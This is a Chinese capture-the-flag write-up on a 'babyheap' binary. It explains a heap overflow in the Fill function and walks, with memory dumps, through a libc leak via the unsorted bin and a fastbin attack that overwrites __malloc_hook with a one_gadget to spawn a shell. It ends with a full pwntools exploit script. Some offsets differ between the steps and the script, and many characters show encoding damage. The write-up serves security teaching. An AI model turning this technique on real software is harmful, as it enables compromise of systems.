過段時(shí)間沒有輸入則會(huì)顯示Alarm clock，與sub_B70有關(guān)（調(diào)用alarm，nop掉）。

共有5個(gè)選項(xiàng)。

Allocate：可以分配0-15，總共16個(gè)chunk，大小不固定，最大不超過4096。從指定內(nèi)存，每3個(gè)qword檢查，flag是否為0（證明該index還未使用），如果是就把相關(guān)數(shù)據(jù)記錄在此，否則順序往后移3個(gè)qword。

使用calloc分配內(nèi)存，calloc在動(dòng)態(tài)分配完內(nèi)存后，自動(dòng)初始化該內(nèi)存空間為零，而malloc不初始化，里邊數(shù)據(jù)是隨機(jī)的垃圾數(shù)據(jù)。

分配完，flag=1，記錄長度和地址。譬如

依次存儲(chǔ)flag、大小、地址

000019E2F87FF280? 01 00 00 00 00 00 00 00? 00 01 0000 00 00 00 00

000019E2F87FF290? 10 90 C7 AB 09 56 00 00? 01 00 00 00 00 00 00 00

000019E2F87FF2A0? 20 00 00 00 00 00 00 00? 20 91C7 AB 09 56 00 00

Fill：輸入index，填充數(shù)據(jù)前檢查flag是否為1，如果flag=1，才有后續(xù)操作。輸入長度和內(nèi)容。（沒有將輸入長度與分配內(nèi)存大小做比較，有可能輸入的內(nèi)容超過內(nèi)存大?。?/b>

sub_11B2(0x00005609ABC79120,6)

{

???????? read(0,0x00005609ABC79120,6);?

}

Dump:先檢查對(duì)應(yīng)的flag是否為1

sub_130F(0x00005609ABC79120, 0x20)? //頂多輸出整個(gè)chunk的內(nèi)容，不會(huì)超邊界讀取

{

???????? write(1,0x00005609ABC79120, 0x20);

}

delete：檢查flag是否為1？如果flag=1，則free地址，之后將存在數(shù)組里的flag，size，地址清零。

sub_B70：根據(jù)/dev/urandom算出一個(gè)地址，用此地址作為存儲(chǔ)各chunk相關(guān)信息的數(shù)組起始地址。

總結(jié)：所有操作前都會(huì)檢查flag是否為1，因此UAF就別想了。刪除時(shí)也沒有任何問題，僅在Fill時(shí)沒有校驗(yàn)輸入長度和chunk長度之間的關(guān)系，可以造成堆溢出。

使用checksec檢查該程序的安全機(jī)制

安全機(jī)制全開了。

利用思路：

1、首先要泄露libc基址?？梢岳胾nsortedbin的fd和bk指向自身main_arena+88，從而計(jì)算libc基址。

2、拿到libc基址后，利用Fill功能存在的堆溢出，修改chunk的fd，向malloc_hook前的某個(gè)位置分配chunk，從而修改malloc_hook值

3、往malloc_hook里填入one_gadget，并觸發(fā)。這次不能像以前一樣修改got表了，因?yàn)殚_了Full RELRO。所謂 one_gadget 就是一個(gè)實(shí)現(xiàn)了直接執(zhí)行system(‘/bin/sh’)的程序跳板。常見的，可以使用one_gadget覆蓋劫持got表、返回地址、hook（__malloc_hook、__free_hook）等等操作，也就是當(dāng)可以劫持控制流后覆蓋的捷徑

具體過程，下面盡可能列出每個(gè)步驟的詳細(xì)截圖，方便像我一樣的小白清楚流程：

1、首先創(chuàng)建4個(gè)chunk

allocate(0x48)#0? a010?51

allocate(0x40)#1? a060?51

allocate(0x40)#2? a0b0?51

allocate(0x40)#3? a100?51

數(shù)組存儲(chǔ)各chunk信息

000024B519199E10? 01 00 00 00 00 00 00 00? 48 00 00 00 00 00 00 00

000024B519199E20? 10 A0 E7 1C C7 55 00 00? 01 00 00 00 00 00 00 00

000024B519199E30? 40 00 00 00 00 00 00 00? 60 A0 E7 1C C7 55 00 00

000024B519199E40? 01 00 00 00 00 00 00 00? 40 00 00 00 00 00 00 00

000024B519199E50? B0 A0 E7 1C C7 55 00 00?01 00 00 00 00 00 00 00

000024B519199E60? 40 00 00 00 00 00 00 00? 00 A1 E7 1C C7 55 00 00

2、修改chunk1的頭部，使得chunk1的size=0xA1

update(0,0x49,'\x00'*0x48 + '\xa1')?

修改前

000055C71CE7A000? 00 00 00 00 00 00 00 00? 51 00 00 00 00 00 00 00

000055C71CE7A010? 00 00 00 00 00 00 00 00? 00 00 00 00 00 00 00 00

000055C71CE7A020? 00 00 00 00 00 00 00 00? 00 00 00 00 00 00 00 00

000055C71CE7A030? 00 00 00 00 00 00 00 00? 00 00 00 00 00 00 00 00

000055C71CE7A040? 00 00 00 00 00 00 00 00? 00 00 00 00 00 00 00 00

000055C71CE7A050? 00 00 00 00 00 00 00 00? 51 00 00 00 00 00 00 00

修改后

000055C71CE7A000? 00 00 00 00 00 00 00 00? 51 00 00 00 00 00 00 00?

000055C71CE7A010? 00 00 00 00 0000 00 00? 00 00 00 00 00 00 00 00?

000055C71CE7A020? 00 00 00 00 0000 00 00? 00 00 00 00 00 00 00 00?

000055C71CE7A030? 00 00 00 00 0000 00 00? 00 00 00 00 00 00 00 00?

000055C71CE7A040? 00 00 00 00 0000 00 00? 00 00 00 00 00 00 00 00?

000055C71CE7A050? 00 00 00 00 0000 00 00? A10000 00 00 00 00 00?

3、刪除chunk1，讓其放到unsorted

bin中

delete(1)??a060? ?#chunk1放入unsortedbin

問：為什么會(huì)放入unsortedbin?

回答：如果剛剛釋放的空間大于max_fast=64B（此時(shí)chunk1的size被改成A1了），那么會(huì)首先放到unsorted

bin中(只有一個(gè)，且為bins[1])，在下一次內(nèi)存分配時(shí),如果無法從fastbins中分配空間，那么會(huì)首先在這里尋找空間。

刪前

000055C71CE7A050? 00 00 00 00 00 00 00 00? A1 00 00 00 00 00 00 00

000055C71CE7A060? 00 00 00 0000 00 00 00? 00 00 00 00 00 00 00 00

000055C71CE7A070? 00 00 00 0000 00 00 00? 00 00 00 00 00 00 00 00

000055C71CE7A080? 00 00 00 0000 00 00 00? 00 00 00 00 00 00 00 00

000055C71CE7A090? 00 00 00 0000 00 00 00? 00 00 00 00 00 00 00 00

000055C71CE7A0A0? 00 00 00 00 00 00 00 00? 51 00 00 00 00 00 00 00

000055C71CE7A0B0? 00 00 00 00 00 00 00 00? 00 00 00 00 00 00 00 00

刪除后

000055C71CE7A050? 00 00 00 00 00 00 00 00? A1 00 00 00 00 00 00 00

000055C71CE7A060? B8 B7 EE 38 0A 7F 00 00? B8 B7 EE 38 0A 7F 00 00

000055C71CE7A070? 00 00 00 0000 00 00 00? 00 00 00 00 00 00 00 00

000055C71CE7A080? 00 00 00 0000 00 00 00? 00 00 00 00 00 00 00 00

000055C71CE7A090? 00 00 00 0000 00 00 00? 00 00 00 00 00 00 00 00

000055C71CE7A0A0? 00 00 00 00 00 00 00 00? 51 00 00 00 00 00 00 00

000055C71CE7A0B0? 00 00 00 00 00 00 00 00? 00 00 00 00 00 00 00 00

4、申請(qǐng)大小為0x40的chunk，使得chunk2被移到unsortedbin

allocate(0x40)? a060? #chunk2in unsordtedbin but flag==1

問：unsorted bin怎么從chunk1移動(dòng)到了chunk2？

回答：如果unsortedbin中只有一個(gè)chunk，在分配時(shí)如果申請(qǐng)的nb大小比這個(gè)chunk小的話，會(huì)將這個(gè)chunk割一塊剛好滿足nb大小的小chunk出來給用戶，然后將剩下的空間繼續(xù)放在unsortedbin里，將其fd和bk都設(shè)置為unsortedbin地址。

000024B519199E10? 01 00 00 00 00 00 00 00? 48 00 00 00 00 00 00 00

000024B519199E20? 10 A0 E7 1C C7 55 00 00? 01 00 00 00 00 00 00 00

000024B519199E30? 40 00 00 00 00 00 00 00? 60 A0 E7 1C C7 55 00 00

000024B519199E40? 01 00 00 00 00 00 00 00? 40 00 00 00 00 00 00 00

000024B519199E50? B0 A0 E7 1C C7 55 00 00? 01 00 00 00 00 00 00 00

000024B519199E60? 40 00 00 00 00 00 00 00? 00 A1 E7 1C C7 55 00 00

000055C71CE7A050? 00 00 00 00 00 00 00 00? 51 00 00 00 00 00 00 00

000055C71CE7A060? 00 00 00 0000 00 00 00? 00 00 00 00 00 00 00 00

000055C71CE7A070? 00 00 00 0000 00 00 00? 00 00 00 00 00 00 00 00

000055C71CE7A080? 00 00 00 0000 00 00 00? 00 00 00 00 00 00 00 00

000055C71CE7A090? 00 00 00 0000 00 00 00? 00 00 00 00 00 00 00 00

000055C71CE7A0A0? 00 00 00 00 00 00 00 00? 51 00 00 00 00 00 00 00

000055C71CE7A0B0? B8 B7EE 38 0A 7F 00 00? B8 B7 EE 38 0A 7F 0000

000055C71CE7A0C0? 00 00 00 00 00 00 00 00? 00 00 00 00 00 00 00 00

5、通過查看unsorted bin，泄露libc基址

view(2)?a0b0

main_arena+88=0x7F0A38EEB7B8

libc_base=0x7F0A38EEB7B8-88-0x3c2760=0x7F0A38B29000

備注：0x3c2760是通過查看libc.so中malloc_trim函數(shù)確定的。每個(gè)libc版本的數(shù)值都不同，需要具體分析得出。0x3c2760是在我的調(diào)試環(huán)境ubuntu 14.04 64bit中的libc-2.19.so確定的，而該程序所帶的libc.so.6中應(yīng)為0x3c4b20。

6、創(chuàng)建chunk4

allocate(0x40)? a0b0?#4clear unsortedbin place 2

000024B519199E10? 01 00 00 00 00 00 00 00? 48 00 00 00 00 00 00 00

000024B519199E20? 10 A0 E7 1C C7 55 00 00? 01 00 00 00 00 00 00 00

000024B519199E30? 40 00 00 00 00 00 00 00? 60 A0 E7 1C C7 55 00 00

000024B519199E40? 01 00 00 00 00 00 00 00? 40 00 00 00 00 00 00 00

000024B519199E50? B0 A0 E7 1C C7 55 00 00? 01 00 00 00 00 00 00 00

000024B519199E60? 40 00 00 00 00 00 00 00? 00 A1 E7 1C C7 55 00 00

000024B519199E70? 01 00 00 00 00 00 00 00? 40 00 00 00 00 00 00 00

000024B519199E80? B0 A0?E7 1C C7 55 00 00 ?00 00 00 00 00 0000 00

000055C71CE7A0A0? 00 00 00 00 00 00 00 00? 51 00 00 00 00 00 00 00

000055C71CE7A0B0? 00 00 00 0000 00 00 00? 00 00 00 00 00 00 00 00

000055C71CE7A0C0? 00 00 00 00 00 00 00 00? 00 00 00 00 00 00 00 00

000055C71CE7A0D0? 00 00 00 00 00 00 00 00? 00 00 00 00 00 00 00 00

000055C71CE7A0E0? 00 00 00 00 00 00 00 00? 00 00 00 00 00 00 00 00

7、修改chunk4

update(4,0x40,'a'*0x40)?? a0b0

000055C71CE7A0A0? 00 00 00 00 00 00 00 00? 51 00 00 00 00 00 00 00

000055C71CE7A0B0? 61 61 61 6161 61 61 61? 61 61 61 61 61 61 61 61

000055C71CE7A0C0? 61 61 61 61 6161 61 61? 61 61 61 61 61 61 61 61

000055C71CE7A0D0? 61 61 61 6161 61 61 61? 61 61 61 61 61 61 61 61

000055C71CE7A0E0? 61 61 61 6161 61 61 61? 61 61 61 61 61 61 61 61

000055C71CE7A0F0? 00 00 00 00 00 00 00 00? 51 00 00 00 00 00 00 00

000055C71CE7A100? 00 00 00 00 00 00 00 00? 00 00 00 00 00 00 00 00

8、修改chunk2，即為chunk4

update(2,0x10,'b'*0x10)? a0b0

000055C71CE7A0A0? 00 00 00 00 00 00 00 00? 51 00 00 00 00 00 00 00

000055C71CE7A0B0? 62 62 62 6262 62 62 62? 62 62 62 62 62 62 62 62

000055C71CE7A0C0? 61 61 61 61 61 61 61 61?61 61 61 61 61 61 61 61

000055C71CE7A0D0? 61 61 61 61 61 61 61 61? 61 61 61 61 61 61 61 61

000055C71CE7A0E0? 61 61 61 61 61 61 61 61? 61 61 61 61 61 61 61 61

000055C71CE7A0F0? 00 00 00 00 00 00 00 00? 51 00 00 00 00 00 00 00

000055C71CE7A100? 00 00 00 00 00 00 00 00? 00 00 00 00 00 00 00 00

9、創(chuàng)建chunk5

allocate(0x60)#5? a150

000024B519199E10? 01 00 00 00 00 00 00 00? 48 00 00 00 00 00 00 00

000024B519199E20? 10 A0 E7 1C C7 55 00 00? 01 00 00 00 00 00 00 00

000024B519199E30? 40 00 00 00 00 00 00 00? 60 A0 E7 1C C7 55 00 00

000024B519199E40? 01 00 00 00 00 00 00 00? 40 00 00 00 00 00 00 00

000024B519199E50? B0 A0 E7 1C C7 55 00 00? 01 00 00 00 00 00 00 00

000024B519199E60? 40 00 00 00 00 00 00 00? 00 A1 E7 1C C7 55 00 00

000024B519199E70? 01 00 00 00 00 00 00 00? 40 00 00 00 00 00 00 00

000024B519199E80? B0 A0 E7 1C C7 55 00 00? 01 0000 00 00 00 00 00

000024B519199E90? 60 00 00 00 00 00 00 00? 50 A1 E7 1C C7 55 00 00

000055C71CE7A140? 00 00 00 00 00 00 00 00? 71 00 00 00 00 00 00 00

000055C71CE7A150? 00 00 00 00 00 00 00 00? 00 00 00 00 00 00 00 00

000055C71CE7A160? 00 00 00 00 00 00 00 00? 00 00 00 00 00 00 00 00

000055C71CE7A170? 00 00 00 00 00 00 00 00? 00 00 00 00 00 00 00 00

000055C71CE7A180? 00 00 00 00 00 00 00 00? 00 00 00 00 00 00 00 00

000055C71CE7A190? 00 00 00 00 00 00 00 00? 00 00 00 00 00 00 00 00

000055C71CE7A1A0? 00 00 00 00 00 00 00 00? 00 00 00 00 00 00 00 00

10、刪除chunk5，使得fastbin指向chunk5

delete(5)???a150? # after delete, fastbins=chunk5

000024B519199E10? 01 00 00 00 00 00 00 00? 48 00 00 00 00 00 00 00

000024B519199E20? 10 A0 E7 1C C7 55 00 00? 01 00 00 00 00 00 00 00

000024B519199E30? 40 00 00 00 00 00 00 00? 60 A0 E7 1C C7 55 00 00

000024B519199E40? 01 00 00 00 00 00 00 00? 40 00 00 00 00 00 00 00

000024B519199E50? B0 A0 E7 1C C7 55 00 00? 01 00 00 00 00 00 00 00

000024B519199E60? 40 00 00 00 00 00 00 00? 00 A1 E7 1C C7 55 00 00

000024B519199E70? 01 00 00 00 00 00 00 00? 40 00 00 00 00 00 00 00

000024B519199E80? B0 A0 E7 1C C7 55 00 00? 00 00 00 00 00 00 00 00

000024B519199E90? 00 00 00 0000 00 00 00? 00 00 00 00 00 00 00 00

11、選取合適的地址作為fake_chunk，修改chunk3的fd，使其指向fake_chunk

fake_chunk = leak_addr - 88 - 0x2b- 8=0x7F0A38EEB7B8-88-0x2b-8=7F0A38EEB72D

payload = 'a'*0x40 + p64(0) + p64(0x70) +p64(fake_chunk)

update(3,len(payload),payload)?? a100

為啥選擇7F0A38EEB72D 作為fake_chunk？fastbin attack時(shí)候?qū)σ薷牡膄d是有要求的，不能隨便取。

答復(fù)：因?yàn)?x7F0A38EEB72D+8為chunk的size字段所在的值，剛好此地值得數(shù)值為0x7f，我們需要在malloc_hook向上尋找是否可以錯(cuò)位出一個(gè)合法的 size 域。因?yàn)?0x7f 在計(jì)算 fastbin index 時(shí)，是屬于 index 5 的，即 chunk 大小為 0x70 的。

為什么一定要選取chunk為70的？

答復(fù)：因?yàn)榍懊鎑elete(5)就將chunk5放入了fastbins 0x70中。因此我們需要在malloc_hook上找出符合條件的size（0x70）。這樣通過fastbin的fd指針將chunk5與fake_chunk通過單鏈表連接起來。

字節(jié)錯(cuò)位法：這種利用字節(jié)錯(cuò)位，提取出一個(gè)滿足條件的size出來，以便分配chunk到這個(gè)地方。該方法多用于got表不能修改的情況。

? ? ? ? ?這里可以發(fā)現(xiàn)在0x7fd7a4da9af5處開始的8個(gè)字節(jié)，可以抽出一個(gè)7f，當(dāng)作size時(shí)就相當(dāng)于0x70，符合我們fastbin的大小范圍。因此把0x7fd7a4da9af5-8的地方作為fake_chunk的起始地址，覆蓋某個(gè)chunk的fd。

原理：fd只要其size域是否屬于該chunk就可以通過malloc檢查。因此只要想寫入的地址附近有屬于該fastbin的size就可以讓malloc分配到該位置。

如此選擇一個(gè)合適的地址設(shè)為A，則chunk起始地址為A-8(pre size)，usrdata(fd指針與之同體)部分為A+8，且上一個(gè)fd指向地址為A-8。

構(gòu)造的xx大小-0x10，為malloc的參數(shù)，即返回的usrdata大小。

修改后，fd指向了7F0A38EEB72D

000055C71CE7A0F0? 00 00 00 00 00 00 00 00? 51 00 00 00 00 00 00 00

000055C71CE7A100? 61 61 61 6161 61 61 61? 61 61 61 61 61 61 61 61

000055C71CE7A110? 61 61 61 6161 61 61 61? 61 61 61 61 61 61 61 61

000055C71CE7A120? 61 61 61 6161 61 61 61? 61 61 61 61 61 61 61 61

000055C71CE7A130? 61 61 61 6161 61 61 61? 61 61 61 61 61 61 61 61

000055C71CE7A140? 00 00 00 0000 00 00 00? 70 00 00 00 00 00 00 00

000055C71CE7A150? 2D B7 EE 38 0A 7F 00 00? 00 00 00 00 00 00 00 00

12、創(chuàng)建chunk，分配之前刪除chunk5的地址

allocate(0x60) a150? ?#5

000024B519199E10? 01 00 00 00 00 00 00 00? 48 00 00 00 00 00 00 00

000024B519199E20? 10 A0 E7 1C C7 55 00 00? 01 00 00 00 00 00 00 00

000024B519199E30? 40 00 00 00 00 00 00 00? 60 A0 E7 1C C7 55 00 00

000024B519199E40? 01 00 00 00 00 00 00 00? 40 00 00 00 00 00 00 00

000024B519199E50? B0 A0 E7 1C C7 55 00 00? 01 00 00 00 00 00 00 00

000024B519199E60? 40 00 00 00 00 00 00 00? 00 A1 E7 1C C7 55 00 00

000024B519199E70? 01 00 00 00 00 00 00 00? 40 00 00 00 00 00 00 00

000024B519199E80? B0 A0 E7 1C C7 55 00 00? 01 00 00 00 00 00 00 00

000024B519199E90? 60 00 00 0000 00 00 00? 50 A1 E7 1C C7 55 00 00

000055C71CE7A140? 00 00 00 00 00 00 00 00? 70 00 00 00 00 00 00 00

000055C71CE7A150? 00 00 00 00 00 00 00 00?00 00 00 00 00 00 00 00

000055C71CE7A160? 00 00 00 00 00 00 00 00? 00 00 00 00 00 00 00 00

000055C71CE7A170? 00 00 00 00 00 00 00 00? 00 00 00 00 00 00 00 00

000055C71CE7A180? 00 00 00 00 00 00 00 00? 00 00 00 00 00 00 00 00

000055C71CE7A190? 00 00 00 00 00 00 00 00? 00 00 00 00 00 00 00 00

000055C71CE7A1A0? 00 00 00 00 00 00 00 00? 00 00 00 00 00 00 00 00

13、創(chuàng)建chunk6，分配地址為之前偽造的fake_chunk+0x10=00007F0A38EEB73D

allocate(0x60)? #6?fake_chunk

000024B519199E10? 01 00 00 00 00 00 00 00? 48 00 00 00 00 00 00 00

000024B519199E20? 10 A0 E7 1C C7 55 00 00? 01 00 00 00 00 00 00 00

000024B519199E30? 40 00 00 00 00 00 00 00? 60 A0 E7 1C C7 55 00 00

000024B519199E40? 01 00 00 00 00 00 00 00? 40 00 00 00 00 00 00 00

000024B519199E50? B0 A0 E7 1C C7 55 00 00? 01 00 00 00 00 00 00 00

000024B519199E60? 40 00 00 00 00 00 00 00? 00 A1 E7 1C C7 55 00 00

000024B519199E70? 01 00 00 00 00 00 00 00? 40 00 00 00 00 00 00 00

000024B519199E80? B0 A0 E7 1C C7 55 00 00? 01 00 00 00 00 00 00 00

000024B519199E90? 60 00 00 00 00 00 00 00? 50 A1 E7 1C C7 55 00 00

000024B519199EA0? 01 00 00 0000 00 00 00? 60 00 00 00 00 00 00 00

000024B519199EB0? 3D B7 EE 380A 7F 00 00? 0000 00 00 00 00 00 00

14、修改chunk6，使得修改后__malloc_hook填充one_gadget地址

update(6,0x3+8,'c'*0x3+p64(one_gadget))? //修改后__malloc_hook填充了one_gadget地址

00007F0A38EEB73D位于__malloc_hook前3個(gè)字節(jié)的位置

libc_2.19.so:00007F0A38EEB73Ddb??? 0

libc_2.19.so:00007F0A38EEB73E db??? 0

libc_2.19.so:00007F0A38EEB73F db??? 0

libc_2.19.so:00007F0A38EEB740__malloc_hook db??? 0

libc_2.19.so:00007F0A38EEB741 db??? 0

libc_2.19.so:00007F0A38EEB742 db??? 0

libc_2.19.so:00007F0A38EEB743 db??? 0

libc_2.19.so:00007F0A38EEB744 db??? 0

libc_2.19.so:00007F0A38EEB745 db??? 0

運(yùn)行one_gadget，列出了4個(gè)可用地址。這里我們選取0x4647c

one_gadget =libc_base +0x4647c=0x7F0A38B29000+0x4647c=7F0A38B6F47C

修改后，__malloc_hook填充了one_gadget地址7F0A38B6F47C

00007F0A38EEB730? 60 CF BA 38 0A 7F 00 00? 00 00 00 00 0063 63 63

00007F0A38EEB740? 7C F4 B6 380A 7F 00 00? 0000 00 00 00 00 00 00

15、在調(diào)用calloc時(shí)會(huì)調(diào)用malloc_hook中的函數(shù)地址7F0A38B6F47C，即為執(zhí)行了execve("/bin/sh",rsp+0x30, environ)

alloc(10)

完整exp

from pwn import *

context.log_level='debug'

cn = process('./babyheap')

elf = ELF('./babyheap')

libc = ELF('./libc.so.6')

sl????? = lambda data?????????????? :cn.sendline(str(data))

r?????? = lambda numb=4096????????? :cn.recv(numb)

ru????? = lambda delims???????????? :cn.recvuntil(delims)

irt???? = lambda??????????????????? :cn.interactive()

uu64??? = lambda data?????????????? :u64(data.ljust(8, '\0'))

def allocate(size):

??? ru('Command: ')

??? sl(1)

??? ru('Size: ')

??? sl(size)

def update(index,size,content):

??? ru('Command: ')

??? sl(2)

??? ru('Index: ')

??? sl(index)

??? ru('Size: ')

??? sl(size)

??? ru('Content: ')

??? sl(content)

def delete(index):

??? ru('Command: ')

??? sl(3)

??? ru('Index: ')

??? sl(index)

def view(index):

??? ru('Command: ')

??? sl(4)

??? ru('Index: ')

??? sl(index)

allocate(0x48)#0

allocate(0x40)#1

allocate(0x40)#2

allocate(0x40)#3

update(0,0x49,'\x00'*0x48 + '\xa1')#change chunk1's size

delete(1)? # chunk1 inunsortedbin

raw_input('delete chunk1')

gdb.attach(cn)

allocate(0x40)#chunk2 in unsordtedbin but flag==1

raw_input('create chunk1, chunk2 in unsortedbin')

gdb.attach(cn)

view(2)

ru('Content: \n')

leak_addr = uu64(r(6))

success('leak_addr:'+hex(leak_addr))

libc_base = leak_addr - 88-0x3c4b20

success('libc_base:'+hex(libc_base))

allocate(0x40)#4 clear unsortedbin place 2

update(4,0x40,'a'*0x40)

update(2,0x10,'b'*0x10)

#trim malloc_hook

allocate(0x60)#5

delete(5)?? # after delete,fastbins=chunk5

raw_input('delete chunk5')

gdb.attach(cn)

fake_chunk = leak_addr - 88 - 0x2b- 8

payload = 'a'*0x40 + p64(0) + p64(0x70) + p64(fake_chunk)

update(3,len(payload),payload)

allocate(0x60)#5 after created, fastbins changed to fake_chunk

raw_input('create chunk5')

gdb.attach(cn)???

allocate(0x60) #6

one_gadget = libc_base + 0x4526a

success('one_gadget:'+hex(one_gadget))

update(6,0x13+8,'c'*0x13+p64(one_gadget))

raw_input('update chunk6 to one_gadget')

allocate(0x10)

'''

one_gadget libc.so.6

0x45216

0x4526a

0xf02a4

0xf1147

'''

irt()

本篇參考了下列文章

https://bbs.pediy.com/thread-247381.htm